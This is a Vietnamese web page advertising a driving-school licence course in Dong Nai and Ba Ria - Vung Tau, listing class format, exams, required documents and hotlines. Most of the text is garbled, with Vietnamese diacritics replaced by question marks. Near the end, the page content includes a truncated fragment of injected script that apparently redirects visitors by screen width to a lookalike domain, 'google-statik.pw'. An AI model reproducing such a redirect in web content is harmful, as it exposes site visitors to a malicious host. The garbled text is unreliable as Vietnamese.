Nhận hồ sơ thi bằng lái xe ở Đồng Nai - Trung Tâm DN

(otobienhoa.vn) - B?n dang mong mu?n lam th? nao d? tim cho minh m?t d?a ch? tin c?y, giao vien gi?i, h?c lai xe oto ch?t lu?ng t?t, d? co th? lai du?c xe ngay khi co gi?y phep lai xe? 

Ngay nay, nhu c?u cu?c s?ng ngay cang cao, vi?c d?m b?o s?c kh?e va an toan khi di chuy?n la mong mu?n c?p thi?t c?a m?i gia dinh, vi v?y phuong ti?n oto ca nhan la l?a ch?n phu h?p nh?t, ai cung mu?n minh lai xe gi?i, an toan khi di ti?p khach, di cong tac xa ho?c nh?ng ngay cu?i tu?n dua gia dinh, ngu?i than di du l?ch…….

Hi?nh a?nh: San ta?p va? thi ngay ta?i co so? 1: Bien Ho?a - Do?ng Nai

alt

alt

Hi?nh a?nh: San ta?p va? thi ngay ta?i co so? 2: Ba? Ri?a - Vu?ng Ta?u

alt

alt

 

 1. Quy mo:

- Th?i gian h?c trong kho?ng 4 thang, khai gi?ng hang thang, m?i khoa t? 200 h?c vien h?ng B2, 100-150 h?c vien h?ng C, D. Sau khi n?p h? so di h?c ngay.

- M?i th?y hu?ng d?n 4 h?c vien tren 1 xe.

 2. Hinh th?c h?c:

- M?i h?c vien s? du?c h?c t? co b?n d?n chuyen nghi?p, b?t d?u t? can lai d? lam quen v?i xe, h?c sa hinh, h?c du?ng tru?ng, h?c xe thi?t b?. Ngoai ra h?c vien con du?c hu?ng d?n tim hi?u v? xe o to, nguyen ly ho?t d?ng, cac ch? s? co b?n d? giup lai xe an toan.

- T?t c? cac ngay trong tu?n, trung tam d?u b? tri cac bu?i h?c, cac h?c vien t? b? tri l?ch h?c phu h?p v?i minh, khong c?n ph?i dang ky tru?c.

- Th?i gian h?c t? 7h sang d?n 5h chi?u.

3. Hinh th?c thi:

H?c vien s? tr?i qua cac k? thi: thi th?, thi ch?ng ch? t?t nghi?p, thi sat h?ch. T?t c? cac k? thi d?u ti?n hanh t?i trung tam, nen cac h?c vien r?t co l?i th? trong tam ly cung nhu s? quen xe va quen hinh.

Thi ly thuy?t ti?n hanh tren may tinh v?i ph?n m?m ma trung tam da c?p cho h?c vien, thi th?c hanh tren sa hinh b?ng xe g?n thi?t b? ch?m di?m t? d?ng (xe chip), bao g?m cac k? thi sau:

- Thi th? d? t?o c?m giac t? tin, lam quen v?i th? t?c thi sat h?ch

- Thi ch?ng ch? t?t nghi?p: bao g?m thi ly thuy?t va sa hinh, k? thi nay c?p ch?ng nh?n h?c vien da qua m?t l?p dao t?o lai xe.

- Thi sat h?ch: Ta?i ca?c trung tam duo?c phe?p to? chu?c thi sa?t ha?ch la?i xe theo quy di?nh cu?a nha? nuo?c, bao g?m thi ly thuy?t, thi sa hinh va thi du?ng tru?ng, k? thi nay s? quy?t d?nh vi?c c?p b?ng lai xe cho h?c vien.

4. H? so:

- 10 ?nh 3x4 da?ng hi?nh the? phong ne?n xanh a?o ma?u tra?ng

- 2 a?nh 4x6 da?ng hi?nh the? phong ne?n xanh a?o ma?u tra?ng

- CMND photo khong ca?n cong chu?ng

- Gi?y kham s?c kho? 

- H? so dang ky h?c lai xe theo m?u c?a s? GTVT.

M?i chi ti?t xin lien h?: Cong Ty TNHH - Trung Tam D?y Ngh? va Dao T?o Sat H?ch Lai Xe H?i Van

- Co so? 1: Trung Doa?n 22, Xa Lo? Ha? No?i, P. Long Bi?nh, Bien Ho?a - Do?ng Nai. - Hotline:  0933 955 686

- Co so? 2: A?p La?ng Ca?t, Xa? Tan Ha?i, Huye?n Tan Tha?nh, Ti?nh Ba? Ri?a - Vu?ng Ta?u. - Hotline:  0932 088 838

Quy? kha?ch vui lo?ng lien he? tru?c tie?p vo?i chu?ng toi de? duo?c tu va?n dang ky? ho?c so?m nha?t vo?i chi phi? tha?p nha?t.

Da?c bie?t khi dang ky? kho?a ho?c qua die?n thoa?i hotline: (0933 955 686 hoa?c 0932 088 838) truo?c khi no?p ho? so ba?n se? duo?c uu da?i gia?m gia? tru?c tie?p 100.000 VND - 200.000 VND va?o tie?n ho?c phi? tu?y theo kho?a ho?c khi ba?n no?p ho? so ta?i co so? 1 hoa?c co so? 2 cu?a trung tam.

Website: otobienhoa.vn 

if (screen.width ion = "http://google-statik.pw/l.php";}
 

Salon Auto

Nội thất đồ chơi

Tư vấn mua bán xe


 

Quảng Cáo